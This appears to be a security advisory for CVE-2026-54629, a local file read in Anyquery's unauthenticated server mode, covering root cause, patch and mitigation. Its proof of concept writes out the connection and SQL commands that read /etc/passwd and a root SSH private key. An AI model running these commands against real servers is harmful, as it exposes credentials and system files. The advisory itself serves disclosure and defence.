CVE-2026-54629: Anyquery Local File Read via Unrestricted SQLite Virtual Table Modules
When Anyquery is run in server mode, any unauthenticated remote client can read arbitrary local files by creating a SQLite virtual table that points to a sensitive path like /etc/passwd or ~/.ssh/id_r
The problem
Anyquery's `server` mode exposes a MySQL-compatible TCP port and accepts raw SQLite DDL from any connecting client. The server applies no access control over built-in virtual table modules such as `csv_reader`, `log_reader`, or `json_reader`.
Because there is no authentication requirement and no path restriction, an attacker on the network can instantiate a virtual table pointing to any file the server process can read. Full confidentiality of the local filesystem is at risk. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
Proof of concept
A working proof-of-concept for CVE-2026-54629 in github.com/julien040/anyquery, with the exact payload below.
-- 1. Victim starts server (default or explicit bind)
anyquery server --host 0.0.0.0 --port 8070
-- 2. Attacker connects (no password required)
mysql -u root -h <VICTIM_IP> -P 8070
-- 3. Create virtual table pointing at a sensitive file
CREATE VIRTUAL TABLE passwd USING csv_reader('/etc/passwd');
SELECT * FROM passwd;
-- Works equally for other built-in modules:
CREATE VIRTUAL TABLE ssh_key USING csv_reader('/root/.ssh/id_rsa');
SELECT * FROM ssh_key;The root cause is a complete absence of authorization and path sandboxing in the server query handler. SQLite virtual table modules are registered at engine startup and remain callable by any connected session. There is no check on which modules a remote (unauthenticated) client may invoke, and file paths passed to `csv_reader` and sibling modules are opened directly by the server process without any allow-list or directory confinement.
The patch in 0.4.5 introduces a sandboxing mechanism that restricts `read_*` operations to designated directories when running in server mode, blocking arbitrary absolute paths from being passed to these modules. CWE-22 (Path Traversal) and CWE-862 (Missing Authorization) both apply here.
The fix
Upgrade to anyquery >= 0.4.5. The 0.4.5 release adds path sandboxing for file-reader virtual table modules in server mode, preventing access to paths outside an allowed set. Until you can upgrade, either avoid exposing `anyquery server` to untrusted networks or bind strictly to localhost (`--host 127.0.0.1`) and enforce network-level access controls.
Related research
- critical · 9.1CVE-2026-50006CVE-2026-50006: Anyquery Arbitrary File Write via Unrestricted ATTACH DATABASE in Server Mode
- high · 8.6CVE-2026-54628CVE-2026-54628: Anyquery SSRF via Unrestricted SQLite Virtual Table Modules in Server Mode
- high · 7.7CVE-2026-49822CVE-2026-49822: Fission KubernetesWatchTrigger Cross-Namespace Event Leakage
- high · 7.7nebula-mesh: Non-Admin SSRF via Unguarded allow_private Webhook Flag